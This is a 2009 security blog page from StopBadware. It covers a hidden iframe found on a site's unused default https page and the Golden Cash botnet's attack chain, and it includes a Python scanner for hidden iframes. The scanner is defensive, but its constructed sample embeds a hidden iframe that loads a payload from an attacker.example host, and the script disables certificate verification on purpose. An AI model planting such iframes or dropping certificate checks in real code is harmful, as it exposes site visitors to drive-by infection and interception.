Hiding an infection in an unused SSL site

Posted by Maxim Weinstein Fri, 31 Jul 2009 19:53:53 GMT

Today we saw an interesting case in which no one could find badware on a website that Google reported as infected, until Google tipped us off to check the site over https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, over https an apparently unused default site loaded, along with a hidden iframe that connected to a Chinese server and downloaded a malicious payload. Besides being difficult to track down, as my colleague Oliver points out, intrusion detection systems, network firewalls, and other devices that inspect traffic as it passes through a network would probably miss this payload, because it is carried inside an encrypted SSL stream.

SSL aside, the default websites that web servers (including those embedded in web-enabled devices) enable out of the box can be a security risk, as today’s case shows. Often these default sites are left enabled and are not locked down adequately, making them prime targets for attack; once compromised, they can be used as the destination URL for spam or redirects.

Lesson: when installing a web server, find out which sites are enabled by default, and either disable them or secure and monitor them.
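As an added example (not StopBadware’s own tooling, and not code from the original post), here is a small Python script that does the check described above: it fetches a host over both http and https and flags any iframe that is hidden by zero dimensions or by CSS. The sample page, the attacker.example address and the command-line host name are constructed for the demo; certificate verification is deliberately disabled because a forgotten default SSL site rarely has a valid certificate.

```python
"""Check a site over both http and https for hidden iframes.

Added example, not StopBadware's tooling. Assumes a host name on the
command line; the sample HTML below is constructed for the offline demo.
"""
import re
import ssl
import sys
import urllib.request
from html.parser import HTMLParser

# Inline CSS that hides an element outright.
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeFinder(HTMLParser):
    """Collects every <iframe> and records why it looks hidden, if it does."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().rstrip("px")
            if val.isdigit() and int(val) <= 1:      # 0 or 1 pixel: effectively invisible
                reasons.append(f"{dim}={a[dim]}")
        if HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("style hides element")
        self.iframes.append({"src": a.get("src", ""),
                             "hidden": bool(reasons),
                             "reasons": reasons})


def find_hidden_iframes(html):
    """Return only the iframes that look hidden, with the reasons."""
    p = IframeFinder()
    p.feed(html)
    return [f for f in p.iframes if f["hidden"]]


def scheme_variants(host):
    """Both URLs to test; the https one is the one that was missed in the post."""
    return [f"http://{host}/", f"https://{host}/"]


def fetch(url, timeout=15):
    # We are inspecting content, not trusting it, so an invalid or mismatched
    # certificate on the default SSL site must not stop the check.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as r:
        return r.read().decode("utf-8", errors="replace")


def scan_host(host):
    """Map each scheme URL to its hidden iframes, or to an error string."""
    results = {}
    for url in scheme_variants(host):
        try:
            results[url] = find_hidden_iframes(fetch(url))
        except Exception as e:          # scheme not served, TLS failure, timeout, ...
            results[url] = f"error: {e}"
    return results


# Constructed sample: a default "It works!" page with an injected hidden iframe
# and a legitimate visible one.
SAMPLE_DEFAULT_PAGE = """<html><body>
<h1>It works!</h1>
<iframe src="http://attacker.example/payload.php" width="0" height="0" style="display:none"></iframe>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for url, found in scan_host(sys.argv[1]).items():
            print(url, found)
    else:
        for f in find_hidden_iframes(SAMPLE_DEFAULT_PAGE):
            print("hidden iframe ->", f["src"], f["reasons"])
```

Run it with a host name to test both schemes, or with no arguments to see the parser pick the injected frame out of the constructed sample. Because the check is done on the fetched page, it sees exactly what a browser would receive inside the SSL stream, which is the view that inline network devices lack.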


How criminals make money from compromised websites

Posted by Maxim Weinstein Thu, 30 Jul 2009 14:01:22 GMT

A couple weeks ago, I wrote about a trend of websites being compromised because the webmaster’s computer had a Trojan that was stealing FTP credentials for the site. The folks at Finjan recently released a report detailing the operations of a criminal enterprise, Golden Cash, that uses this approach as an integral part of its operations. From the report (emphasis added):

How does Golden Cash operate?

  1. A potential victim visits a legitimate compromised website.
  2. The compromised website contains a malicious Iframe, causing the victim’s browser to pull an exploit code from the attacker website that is armed with the exploit toolkit.
  3. Upon successful exploitation, a special version of a Trojan, which was especially created for the attacker, is being pulled from the Golden Cash server.
  4. Once installed, the Trojan reports back to its “master”, the Golden Cash server.
  5. The attacker’s account at Golden Cash is credited with payment for the job done.
  6. The first instruction sent by Golden Cash to the victim’s machine, is to install an FTP grabber to steal FTP credentials.
  7. The victim’s machine is now in a pool of infected machines controlled by Golden Cash.
  8. The infected machines are being offered to other cybercriminals using a dedicated website.
  9. The selling prices depend on the location of the infected machines.
  10. After purchase, the victim’s machine gets instructions from the buyer to install additional malware on his/her behalf.
  11. The Trojan on the victim’s machine reports back to Golden Cash on successful installation of the buyer’s malware.
  12. The buyer’s account is charged by Golden Cash for the service rendered.
  13. The victim’s machine goes back in the “available for more infections” pool for more purchases.



Interns needed at our Cambridge office

Posted by Maxim Weinstein Fri, 24 Jul 2009 16:34:17 GMT

We’re looking for one or two good interns to help us with badware website testing and to periodically chip in on QA testing of other Berkman Center websites. If you know of someone near Cambridge, MA who is available 8 to 17 hours per week, please let him or her know of this opportunity. The full description can be found here.


Community member describes meta redirects

Posted by Maxim Weinstein Thu, 23 Jul 2009 20:26:14 GMT

BadwareBusters.org community member Denis describes an emerging web-based malware attack over on his Unmask Parasites blog, and he is seeking additional information:

I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.

[snip]

My research is not complete. I’d like to hear from owners of affected sites and from server admins of compromised web servers. You can probably provide missing information about the attack or correct me if something in my article is not accurate. I’m also interested in any information about the vulnerability that makes this nasty attack possible. Any comments are welcome.

Far more information about the attack is available in his blog post.


Login problems with Google Webmaster Tools

Posted by Maxim Weinstein Thu, 23 Jul 2009 14:40:40 GMT

Some users are reporting difficulty logging into Google’s Webmaster Tools, a console that allows website owners to do a number of Google-related tasks, including requesting a review after removing malware from a site. Google is aware of the issue and is "looking into it."

Meanwhile, if you are trying to request a review and are unable to access Webmaster Tools, you may submit a review request through StopBadware.
